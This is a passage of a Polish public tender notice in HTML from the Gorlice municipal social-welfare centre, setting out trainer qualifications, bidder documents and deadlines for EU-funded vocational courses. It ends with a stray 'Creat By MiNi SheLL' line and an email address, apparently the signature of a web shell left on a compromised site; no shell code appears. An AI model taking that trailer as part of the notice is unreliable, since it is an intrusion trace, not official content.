Trener doradca zawodowy posiadający uprawnienia pedagogiczne, minimum 3 letnie doświadczenie na stanowisku wykładowcy trenera
Trener osoba uprawniona do przeprowadzenia kursu w zawodzie sprzedawca z obsługą kas fiskalnych i programów komputerowych , minimum 3 letnie doświadczenie oraz posiadające uprawnienia pedagogiczne 
Trener osoba uprawniona do przeprowadzenia kursu(szkolenia) w  zawodzie magazynier z obsługa programów komputerowych i  wózków jezdniowych, minimum 3 letnie doświadczenie oraz posiadająca uprawnienia pedagogiczne
Trener osoba uprawniona do przeprowadzenia kursu w  zawodzie  opiekunka dziecięca, minimum 3 letnie doświadczenie  oraz posiadająca uprawnienia pedagogiczne
Trener osoba uprawniona do przeprowadzenia kursu(szkolenia) w  zawodzie kelner barman z obsługą kas fiskalnych, minimum 3 letnie doświadczenie oraz posiadająca uprawnienia pedagogiczne
Trener osoba uprawniona do przeprowadzenia kursu w  zawodzie sprzedawca z obsługą  kas fiskalnych i programów komputerowych , minimum 3 letnie doświadczenie oraz posiadająca uprawnienia pedagogiczne.
Trener osoba uprawniona do przeprowadzenia kursu w  zawodzie spawacza, minimum 3 letnie doświadczenie oraz posiadająca uprawnienia pedagogiczne
Trener osoba uprawniona do przeprowadzenia kursu w  zawodzie obsługa suwnic z poziomu roboczego, minimum 3 letnie doświadczenie oraz posiadająca uprawnienia pedagogiczne	.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku Zamawiający uzna pisemne oświadczenie Wykonawcy w tym zakresie art.22 ust.1 ustawy  (załącznik nr 3 do  SIWZ).
Uwaga !
W sytuacji, gdy Wykonawca przy wykazywaniu spełnienia warunków udziału w postępowaniu polegał będzie na wiedzy  i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od  charakteru prawnego łączących go z nim stosunków, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Ponadto każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa listę podmiotów należących do tej    
samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Prawo zamówień publicznych, tj. w rozumieniu    
ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z późn. zm.), albo informację o tym, że nie należy do grupy kapitałowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)  Oferta na formularzu ofertowym o treści zgodnej z określoną we wzorze stanowiącym zał. nr 1 do SIWZ;
2)  Dokument potwierdzający, iż oferta została podpisana przez osobę uprawnioną, do reprezentowania Wykonawcy Zaświadczenie informacja o wpisie do ewidencji działalności gospodarczej, jeżeli nie wynika to z innych dokumentów załączonych do oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gops.gorlice.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GMINNYM OŚRODKU POMOCY SPOŁECZNEJ, ul. Łukasiewicza 6, 38-300 Gorlice pok.10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2013 godzina 09:30, miejsce: GMINNY OŚRODEK POMOCY SPOŁECZNEJ, ul. Łukasiewicza 6, 38-300 Gorlice pok.10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Szansa pracy nadzieją na lepsze jutro realizowany przez Gminny Ośrodek Pomocy Społecznej w Gorlicach na podstawie umowy zawartej z Wojewódzkim Urzędem Pracy w Krakowie o dofinansowanie wyżej wskazanego projektu w ramach Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki,współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com